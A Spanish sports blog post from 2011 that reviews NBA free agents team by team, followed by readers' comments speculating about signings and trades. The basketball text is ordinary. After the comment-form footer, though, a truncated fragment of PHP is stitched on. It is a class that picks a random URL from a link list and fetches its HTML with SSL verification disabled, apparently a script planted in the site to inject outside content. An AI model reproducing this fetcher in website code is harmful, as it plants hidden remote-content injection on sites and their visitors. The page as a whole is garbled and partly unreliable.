El mercado de agentes libres

30 de November de 2011 por TheDeerHunter

Parece que llega el momento de empezar a hablar seriamente sobre el curso baloncestístico 2011-12. Con todo lo que ha llovido casi ni nos acordábamos que hay un mercado de agentes libres que dirimir. No se trataba de la hornada de “The Decision” pero aparecen piezas apetecibles. Sin tener en cuenta que podría ponerse patas arriba según se implemente la cláusula de amnistía, hoy hablaremos de los agentes libres nominales a nuestros ojos más interesantes.

Atlanta Hawks.- Jamal Crawford: El mejor 6º hombre de 2010 terminó completando una interesante campaña el pasado curso. Sigue siendo un anotador con cartel y ha demostrado encontrarse cómodo saliendo desde el banco. Con 31 años no debería esperar acercarse a los 10,8 kilos que cobraba y menos aún que se los ofrezca Atlanta para retenerle, pero no le van a faltar pretendientes. Tampoco da la impresión que la búsqueda del anillo le obsesione. Suena la ‘Gran Manzana’ ya sea Nets (que con 40 kilos de margen va a salir en todas las quinielas) o NY. Tampoco le irían mal a sus características destinos como NO o Indiana.

 Boston Celtics.- Jeff Green (restringido): Al menos en teoría, la razón de ser de que los Celtics traspasaran a Perkins en un momento tan sensible como el que eligieron era por no asumir su caché de Center titular (léase 8 cifras). De una tacada se cargaban la química del equipo y dejaban tocados sus sistemas defensivos. La única recompensa aparente son los derechos envenenados de Green, jugador de perfil aparentemente superior a Perkins y altamente versátil. Decimos “envenenado” porque tampoco sería del todo raro que las ofertas externas que le lleguen puedan rondar esos 10 millones y una hipotética plaza de titular. Si no logran retenerlo la jugada les habría salido fatal aunque Green no debería olvidar qué color de camiseta viste y no perder la perspectiva a medio plazo. Lo mejor para ambos sería una renovación pero en las últimas horas suena que el pack Rondo + Green está en el mercado.

Boston Celtics.- Glen Davis: Se ve complicada la renovación de “Big Baby” por los Celtics. De hecho, los verdes están más que contentos con que no se hayan prohibido los sign-and-trade para los equipos por encima del impuesto de lujo porque es precisamente el plan que tienen. New Jersey (si no se hacen con David West o se les va Humphries), Orlando, Denver, Atlanta y New Orleans puede ser su destino.

Dallas Mavericks.- Caron Butler: En condiciones normales sería uno de los jugadores más cotizados de la lista. Sin embargo no le beneficia el contexto salarial, ni el haber sufrido una lesión tan grave a su edad y menos que su equipo no notara significativamente su ausencia. Parece improbable una renovación en Dallas y no será fácil que encuentre un contrato acorde a su nivel demostrado. Suenan Nets y en menor medida Bucks como destinos.

Dallas Mavericks.- Tyson Chandler: Se trata de una de las mejores incorporaciones que ha firmado Cuban en los últimos tiempos y el artífice anímico del mayor éxito imaginable de la franquicia. Si hay justicia en este mundo habrá renovación. Están condenados a entenderse.

Dallas Mavericks.- J.J. Barea: Otro de los protagonistas del último título. Pasará tiempo para que se olvide en Dallas su actuación en la postemporada en general y en la final en particular ante el mismísimo Wade. Por características es un jugador difícil de ubicar, aunque también de controlar. Resulta irónico que en su mejor momento quizás termine saliendo. Es lícito que aspire a más minutos y a un contrato mayor pero la situación salarial de la franquicia les exige priorizar operaciones. Debería haber un esfuerzo de ambas partes para renovar. Quizás la amnistía pueda beneficiarle en ese sentido.

Denver Nuggets.- Nenê: A pesar de tener antecedentes de ‘cristal de bohemia’ va a haber guerra por el brasileiro. Grande, rápido, habilidoso, versátil… con 29 años y 8 temporadas a sus espaldas parece mejorar día a día. Los Nuggets intentaron evitar este momento, pero Nenê quería ser reconocido en el mercado. Probablemente lo logre recibiendo el máximo. Denver, New Jersey e Indiana preparan las hachas. Apostaría por su actual equipp pero aflojando la cartera como tiene que ser en este caso.

Denver Nuggets.- Aaron Afflalo (restringido): Uno de los tapados de la lista que probablemente mejorará significativamente sus emolumentos. Con el margen salarial disponible en Denver, medio equipo “atrapado” en China y sus propias virtudes que no son pocas se avecina braguetazo. Particularmente me parece un jugador más aprovechable de lo que se ha visto hasta la fecha.

Detroit Pistons.- Tayshaun Prince: Necesita un cambio de aires urgentemente y casi cualquier equipo con aspiraciones al anillo mataría por contratarle. El problema es que es raro ver espacio salarial disponible en estos equipos. La cláusula de amnistía o la mid-level podrían abrirle puertas. Hasta que se despejen algunas cuestiones suenan tímidamente Nets (cómo no) o Clippers, pero esto no ha hecho nada más que empezar. Tiene la pinta que muy preocupado no está y posiblemente termine jugando donde más le apetezca estar, independiente de salario y promesas de anillo.

Detroit Pistons.- Rodney Stuckey (restringido): ¿Qué se ha hecho mal para que en cuanto se abra la veda la gente no comience a sacarse los ojos para contratarle? La temporada pasada todavía va a pasar mucha factura en Auburn Hills. Por talento demostrado estaba llamado a abanderar unos nuevos Pistons. Con todo lo que ha llovido veremos si deciden igualar cualquier oferta de medio pelo que reciba. Cierta fama de problemático quizás no del todo justa  hace que inexplicablemente el apartado de rumores esté vacío. ¿Tocará cura de humildad? Quizás sea una buena pieza para pescar en río revuelto.

Los Angeles Clippers.- DeAndre Jordan (restringido): Con 23 años, sus características compatibles con Griffin y la escasez de hombres grandes que tiene lugar en la liga no se nos puede pasar por la cabeza otra circunstancia que no sea que los Clippers lo retengan casi a cualquier precio. El peligro de todo esto es que puede terminar saliendo otro Dampier, Curry o Jerome James de la vida.

Memphis Grizzlies.- Marc Gasol (restringido): Tras su último año el segundo Gasol NBA es posiblemente el jugador con mejor cartel del mercado de agentes libres. Los Grizzlies prometieron a Randolph retenerle, pero hoy se da por hecho que le lloverá el máximo desde distintos frentes y se pone en duda que los Grizzlies estén realmente dispuestos a hacer frente ese compromiso. Aunque me parece un pelín excesiva toda esta situación si tuviera que apostar lo haría porque seguirá en Memphis y por el máximo.

Memphis Grizzlies.- Shane Battier: Para bien o para mal otro Gasol se cruza en el camino del bueno de Battier. En este caso le perjudica claramente que los Grizzlies deban afrontar esa renovación. No seguirá en el equipo ya que ofertas no le van a faltar. Ahora mismo suena para Pistons y Clippers, pero también para Thunder y seguro que irán saliendo muchos más pretendientes. Allá donde recale se presupone que va a resultar de utilidad.

New Jersey Nets.- Khris Humphries: Año de vino y rosas para él el curso pasado. Éste no ha comenzado con tan buen pie, pero el segundo mejor reboteador sólo por detrás de Love debería tener asegurado un contrato más que apañado para los próximos años. Se habla de que los Suns lo intentarán con él, pero van a tener difícil que los Nets, con tanto margen, se dejen birlar la cartera.

New Orleans Hornets.- David West: Otro caso de lesión inoportuna a los 31 años y en el peor momento del mundo. A diferencia de algún otro, su equipo lo necesita si tiene alguna remota esperanza de retener a CP3 el año próximo. Eso mantendrá su caché unos cuantos añitos más. Si falla NO, Nets, Pacers y Nuggets pueden andar al acecho.

Orlando Magic.- Jason Richardson: Sus mejores años pasaron y ya nadie espera un petardazo de contrato. Es de las mejores opciones que dispone Magic para tratar de convencer a ‘Supermán’ Howard de que se quede, pero no es indispensable y Jason no debería creerse como tal. Me parece una buena idea para ambas partes mantener su relación sobre todo si hay cláusula de amnistía en cuyo caso la franquicia sería de las más beneficiadas.

Philadelphia 76ers.- Thaddeus Young: Demasiadas dudas se ciernen sobre este caso. Se llegó a hablar de él como mejor 6º hombre en una temporada notable para su equipo. Lleva un tiempo rindiendo más que correctamente pero nunca ha terminado de explotar al nivel que se podía vislumbrar algunas temporadas atrás. La indefinición en su puesto no es fácil de resolver, pequeño para dominar dentro y falto de recursos para destacar fuera. No le beneficia que los Sixers tengan overbooking en las alas y tampoco terminan de confiar en él como hombre interior. Sin tener un mal cartel nadie llega a mostrar con fuerza su interés por él. Posiblemente siga en Philly con un contrato mediano o si no sus huesos podrían terminar en Sacramento o Washington.

Portland TrailBlazers.- Greg Oden (restringido): Operación de alto riesgo, con el agravante de que en Portland ya andan algo desgastados con esta cuestión. Con 23 años, igual termina siendo la bestia parda que estaba llamado a ser pero nadie apostaría ya su casa porque explote. Es difícil que Oden se suba en estas condiciones a la parra, menos aún con su actual equipo, y más difícil es que le lluevan ofertas jugosas para salir. Los Blazers podrían limitar su inversión en alrededor de 7-8 kilos, que ya es dinero añadido a lo que llevan perdido en esta apuesta. Una oferta superior significaría su salida.

Sacramento Kings.- Marcus Thornton (restringido): Algunos no se sabe qué deben hacer ya para ganarse un buen contrato. Marcus lleva promediado casi 14 puntos siendo reserva y carne de traspaso. Vale que es un escolta algo atípico y no es ni primera ronda, pero es uno de los jóvenes más prometedores de la liga. Con todo parece que aún no ha saltado la liebre. En mi opinión que las franquicias no anden pegándose por él es toda una anomalía.

Sacramento Kings.- Samuel Dalembert: No seré yo quien discuta su rendimiento demostrado, pero a estas alturas ya ronda lo que termina siendo un contrato tóxico. Con 30 años el año pasado andaba en 13 kilos y medio. Ofertas mayores ya entrarían en el plano peligroso. Pretendientes no le van a faltar (se habla de Nuggets, Hornets, Rockets, por supuesto Kings y un largo etc…) y desconocemos lo que saldrá de esa dura puja. Algunos especulan con que en el actual contexto podría ir a la baja. En el improbable caso de que se aproxime a la mid-level atentos a Miami Heat. Podría significar anillo.

Utah Jazz.- Andrei Kirilenko: El ruso tiene es ascuas a media liga y es que aún ha de decidir si vuelve a la NBA (Jazz, Nets, Lakers, Clippers…) o se queda en el CSKA de Moscú. Para añadir más leña al fuego, se ha lesionado recientemente y se habla de que no volverá hasta enero. De todas maneras en USA sospechan de que su actual club está exagerando la lesión de Kirilenko para desalentar el interés de la NBA.

Washington Wizards.- Nick Young (restringido): Otro de los jóvenes talentos que puede salir reforzado. A sus 26 años es un top-30 anotador con picos de genialidad y un interesante potencial. Es fácil que se quede junto a Wall.

Comenta

17 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Con la clàusula de amnistía me parece que va a haber gran cantidad de sueños rotos en forma de anillo…

    Yo si fuese Lakers le daba boleto a Artest y fichaba a Batier, perfil similar y mejor actitud.

    Hay ciertos rumores que me cuesta creer y, de ser ciertos, todo apunta a que va a haber bombazos…què diría el Garden si se traspasa a Rondo?Creo que sòlo se acallarìa su furia con un CP3 o Howard. Para mí la opción de traspasar a Garnett por Howard o algo similar me parece algo probable(yo haría un Allen+KG por Howard y me quedaría con Pierce+Rondo+Dwight).

    Creo que los equipos aspirantes a anillo se van a partir la boca por Jamal Crawfors y Prince porque son 2 jugadores que se adaptan al perfil de sexto hombre anotador para playoffs.

    Los Knicks deberían dejar de hacer el idiota y de esperar por agentes libres y hacer movimientos para ganar ya porque pueden quedarse con las ganas de Chris Paul (como pasó con Lebron) y yo no fiaría de las rodillas de Stoudamire o la motivación de Melo.

    Por último, si yo fuese Marc no me quedaría en Memphis si quiero aspirar a algo, no creo que le falten ofertas y, seamos realistas, veo imposible que Grizzlies-Randolph repitan las actuaciones del año pasado. Le van al pelo los Knicks o Heat, a la espera de como se mueva el mercado.

      Citar

  2. Cocinitas dice:
    #2

    Por fin, que ganas de rumores, de oir hablar de celtics, lakers, heat. En definitiva que ganas de NBA.
    Parece que va a ser una pretemporada movidita dado lo especial de la misma, y la inclusión en el nuevo convenio de la ya famosa clausula de amnistia.
    Bien, en cuanto al mercado de agentes libres a mi entender hay dos jugadores principales como son Nené y Marc, creo que dada la escasez de hombres altos ambos consegiran contratos por el maximo. Si bien creo que Marc se quedará en Memphis, no creo que Nené siga en Denver y habrá que ver quien puede permitirse esos 17 kilos anuales que pedirá. Me creo por tanto que bien puede recalar en Nets, o quiza si los Wizards consiguen “amnistiar” a Rashard Lewis en estos ya que se quedarian en solo 18 millones y tendrian que fichar obligatoriamente para llegar al minimo. Otra de las opciones serian los Warriors que estan necesitados de un hombre en la pintura.
    Otro de los agentes libres más apetecibles es Prince, a mi personalmente me pega y mucho en los Clippers, creo que les quedaria un quinteto espectacular si renuevan a Jordan y consiguen algo por Kaman, un quinteto con Jordan, Griffin, Prince, Gordon, Mo Williams con Foye, Aminu, Bledsoe, Gomes y algun interior que consigan por Kaman seria un fijo en playoffs en el Oeste.
    En cuanto al resto, creo que los Mavs mantendran a Chandler, que Butler irá a parar a Nets junto con West y que Crawford y Richardson buscarán un equipo con posibilidades de anillo y minutos, como podria ser Chicago.

      Citar

  3. melo15 dice:
    #3

    I los knicks no pueden fichar a ninguno de estos

      Citar

  4. Cocinitas dice:
    #4

    Salvo que corten a Billups va a estar dificil, creo que esperaran al verano de 2012 a Paul, pero siendo los Knicks cualquier cosa es posible :D. Le vendrian genial un pivot y un base o escolta, quiza quitarse a Billups y traer a Stuckey y Marc e intentar a algun escolta por la Mid level, le saldria un equipo muy competitivo en la conferencia este.

      Citar

  5. KB # 24 dice:
    #5

    Cocinitas:
    Por fin, que ganas de rumores, de oir hablar de celtics, lakers, heat. En definitiva que ganas de NBA.
    Parece que va a ser una pretemporada movidita dado lo especial de la misma, y la inclusión en el nuevo convenio de la ya famosa clausula de amnistia.
    Bien, en cuanto al mercado de agentes libres a mi entender hay dos jugadores principales como son Nené y Marc, creo que dada la escasez de hombres altos ambos consegiran contratos por el maximo. Si bien creo que Marc se quedará en Memphis, no creo que Nené siga en Denver y habrá que ver quien puede permitirse esos 17 kilos anuales que pedirá. Me creo por tanto que bien puede recalar en Nets, o quiza si los Wizards consiguen “amnistiar” a Rashard Lewis en estos ya que se quedarian en solo 18 millones y tendrian que fichar obligatoriamente para llegar al minimo. Otra de las opciones serian los Warriors que estan necesitados de un hombre en la pintura.
    Otro de los agentes libres más apetecibles es Prince, a mi personalmente me pega y mucho en los Clippers, creo que les quedaria un quinteto espectacular si renuevan a Jordan y consiguen algo por Kaman, un quinteto con Jordan, Griffin, Prince, Gordon, Mo Williams con Foye, Aminu, Bledsoe, Gomes y algun interior que consigan por Kaman seria un fijo en playoffs en el Oeste.
    En cuanto al resto, creo que los Mavs mantendran a Chandler, que Butler irá a parar a Nets junto con West y que Crawfordy Richardson buscarán un equipo con posibilidades de anillo y minutos, como podria ser Chicago.

    Cocinitas, estoy de acuerdo contigo en todo menos en la valoración que tiene Kaman en el mercado, se llegó a decir que podía ser traspasado por Iggy o Ellis, ya que al tener el contrato tan elevado que tiene debería ser intercambiado por algun otro contratazo

      Citar

  6. Esteban dice:
    #6

    creo q este año no sera de los AGENTES LIBRES, sino de los jugadores con contratos

    lo hecho por lebron, y como quedo cleveland con su salida, a puesto en alerta a varios equipos con estrellas en ultimo año de contrato, que tienen pocas posibilidades de titulo y a la vez de renovan a esos jugadores

    hablo sin dudas de HOWARD y C3P

    tanto denver como orlando, tienen dos modelos a seguir, o invertir todo como hicieron los cavs hace dos años para tratan de convencer a su estrella que renueve, y si sale medianamente mal, digamos final de conferencia, tener el alto riesgo de que se vayan por NADA y quedar en un limbo como los cavs, con varios jugadores con alts contratos pero sin aspirar a nada

    o hacer mas bien, lo de denver, buscar colocar a su estrella en un traspaso, sabiendo que no van a poder retenerlo a fin de curso, y sacar lo mejor que se pueda para no quedar en la nada

    creo q viendo los resultados de uno y otro, seguramente cp3 sera trasapasado, no hay ni una remota chance que new horleans puedan mejorar tanto su equipo como para llegar ni a final de conferencia, mas ahora que no tienen a west y nisiquiera tienen dueño, y para colmo de males son un mercado muy poco apetecibles para fichar agentes libres
    quiza orlando tenga mas fe en sus fuerzas para intentarlo con howard

    sin dudas estas dos situaciones colocan a los LAKERS como posibles ganadores, los amarillos tienen a gasol y bynun con contratos, son dos internos muy respetados que pueden ser caras de una nueva franquicias y con buena imagen

    creo que todos saldrian ganando si, gasol va a orlando por howard, creo que howard es mas que gasol, pero tampoco tanto mejor, y puede ser la cara del magic, incluso mantenerlo como candidato a final de conferencia

    bynun por cp3, tamb cris es mejor que andrew, pero este tiene contrato, es un centro joven aun, con algunas lesiones pero bi campeon de la nba y a jugado a nivel all star en algun momento, y tiene un valor incalculable de mercado, pueden conseguir enormes jugadores por el en algun traspaso

    asi ambas franquicias al borde del precipicio, conseguirian mantener una estrella en sus equipos bajo contrato, ambos con dos titulos nba

    mientras que los lakers, se cargan dos contratos a punto de expirar, pero QUIEN OPCION MEJOR QUE LOS LAKERS EXISTEN PARA DOS ESTRELLAS SIN CONTRATO, QUE YA HABRIAN JUGADO UN AÑO ALLI, CON KOBE Y SEGURAMENTE UN TITULO

    no hay equipo en la liga de pagar lo q pueden pagar los lakers y atraer veteranos y jovens, es un mercado inmeso, el equipo mas reconocido a nivel mundial y tendrian un equipazo para dominar la proxima decada

    no les parece?

      Citar

  7. melo15 dice:
    #7

    Todos decis que CP3 de cambiara de equipo igual que howard pero i si a lo mekor los dos se quedan en el suyo como acen las verdaderas estrellas o uno se va al quipo del otro
    yo creo que los knicks van a dar mucho que hablar durante este mercado
    Es una de las franqucias preferidad para ir por los jugadores i si se venden a billups(denver) por ty lawson i harrington i despues fichan a david west

      Citar

  8. GreenPride dice:
    #8

    Bueno pues bienvenidos a la rumorología. Ya era hora de empezar a hablar de jugadores.
    Creo que el gran animador del mercado va a ser esa clausula de amnistía. Jugadores sobrevalorados en cuanto a contratos a los que los equipos podrán quitarse de enmedio y liberar espacio salarial pero que una vez liberados pueden ser fenomenales en otros equipos por menos dinero.
    De los que ya están libres, para mí los más interesantes Nene y Crawford en cuanto a potencial pero cobrarán demasiado como para ir a un aspirante a anillo. En una segunda categoría jugadores sin tanto caché pero que podrían ser decisivos para plantillas aspirantes al anillo. En este grupo sobre todo dos 3 muy interesantes como Prince y Battier, grandes defensores y aceptables en ataque, vendrían que ni pintados a Lakers y Celtics por ejemplo. No cuento con los agentes libres de renombre (Marc, Jordan, Young, West) ya que los doy por renovados al igual que a Chandler y Barea. ¡Hagan juego señores!!

      Citar

  9. Cocinitas dice:
    #9

    Los últimos rumores situan a West en los Pacers, seria interesante contar con Hibbert, West, Granger, Hill y Collison, creo que les daria perfectamente para entrar en Playoffs en el Este, pero no más allá.

      Citar

  10. melo15 dice:
    #10

    I hansbrought es uno de los jugadores mas laureados de la historia de la NCAA i aun es joven no se convertira en la estrellas que era en la NCAA pero puede ser un muy buen jugador de equipo. Que lo fichen los knicks i stat de pivot i ami prince no me parece nada aprovechable lei un articula en este blog que la temporada pasada lo abia
    echo fatal con el stuckey ese battier me parece un pedazo de jugador la verdad gran defensor pero tiene tiro?
    I a thornton dudo que le dejen escapar los kings despues del temporadon que se a marcao i humphries creo que se quedara
    I otra cosa porque oden no puede convertirse en un pivot estrella en plan howard

      Citar

  11. infante dice:
    #11

    Bueno, cuanto echaba de menos todo esto XD

    Lo que se comenta de un equipo CP3-Kobe-Howard, a mi personalmente no me atraeria. Tienes tres tios que te hipotecan la casa, con poquito dinero para garantizarte otros 4 tios que aporten algo o que aporten a secas. No me convence. Al menos en Miami tenian a Miller o a Haslem, y en el caso del segundo jugando por 4 perras

    Para el equipo que sigo mas de cerca, los Pacers, no se que tal andaran de pasta, pero a lo mejor para largar a granger o a george por dinero y algun jugador marginal; o bien hacerse con 2-3 jugadores de perfil medio mediante trades o contratos les vale y se apañan. De todos modos veo un center duro y habituado, que hibbert me deja una sensacion de no se que…

      Citar

  12. Esteban dice:
    #12

    melo15:
    I hansbrought es uno de los jugadores mas laureados de la historia de la NCAA i aun es joven no se convertira en la estrellas que era en la NCAA pero puede ser un muy buen jugador de equipo. Que lo fichen los knicks i stat de pivot i ami prince no me parece nada aprovechable lei un articula en este blog que la temporada pasada lo abia
    echo fatal con el stuckey ese battier me parece un pedazo de jugador la verdad gran defensor pero tiene tiro?
    I a thornton dudo que le dejen escapar los kings despues del temporadon que se a marcao i humphries creo que se quedara
    I otra cosa porque oden no puede convertirse en un pivot estrella en plan howard

    amigo, no se q te ha picado pero hasbrought no es agente libre, y no creo que los pacers lo regalan, siendo titular clasificaron a play offs e incluso fue uno de los mejores frente a los bulls, no se de donde sacaste q un equipo sin espacio como los knicks podrian ficharlo

      Citar

  13. Esteban dice:
    #13

    infante: a el equipo que sigo mas de cerca, los Pacers, no se que tal andaran de pasta, pero a lo mejor para largar a granger o a george por dinero y algun jugador marginal; o bien hacerse con 2-3 jugadores de perfil medio mediante trades o contratos les vale y se apañan. De todos modos veo un center duro y habituado, que hibbert me deja una sensacion de no se que…

    amigo, estamos hablando de los LAKERS, la pasada temporada estaban en 90 millones, cp3-kobe-howard, se llevan 60, 30 millones para el resto que mucho no tienen q hacer no me parece descabellado
    si una economia puede hacerlo son los lakers,

      Citar

  14. Esteban dice:
    #14

    no entiendo que quieren los pacers con un veterano como west, es quiza el jugador individual mas parecido a una estrella de todos los agentes libres, incluso ha sido all star, pero tiene 31

    a menos que los pacers muevan mas piezan, y adquieran a butler o crawford en la posicion del escolta, seran un equipo que luchara por pasar a segunda ronda, pero ese es su techo, incluso con gorge hill a bordo

      Citar

  15. Cocinitas dice:
    #15

    Tyson Chandler dice a ESPN que escuchará ofertas de los demás equipos.

      Citar

  16. melo15 dice:
    #16

    Pues digo yo que si los pacers fichan a west hansbroght no jugara tanto digo yo i ademas no importa que no sea agente libre se puede intentar un traspaso i se los pacers quieren un center duro pues no se…(Turiaf)
    Lo que as dicho que se van a unir howard CP3 i kobe es una mierda si seguimos asi la liga acabara sindo un rollo a mi no me gustan nada los trios estos de estrellas i a ningun equipo le interesaria flynn porque en houston con el lowry ese no pegan

      Citar

  17. Ru dice:
    #17

    Howard en los Mavs sería la leche,toda vez que Nowitzki habrá que liberarlo cada vez más de tareas defensivas para que siga arriba del todo unas cuantas tenporadas más.Una pena que no tengan ningún proyecto de estrella estilo Tyreke Evans o algo así(más sign&trade con Chandler) para convencer a los Magic de esa operación,casi lo más apetecible en ese sentido de lo que disponen en Dallas es Barea,y por mucho mercado latino que haya en Orlando(Florida) dista mucho,y me quedo corto,de un traspaso viable y en el que los dos equipos puedan salir ganando.

    A Howard no lo quiero ni en los Lakers ni en los Knicks….quiero que haya varios equipos potentes en la NBA,en Brooklyn estaría bien verlo junto a Deron.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>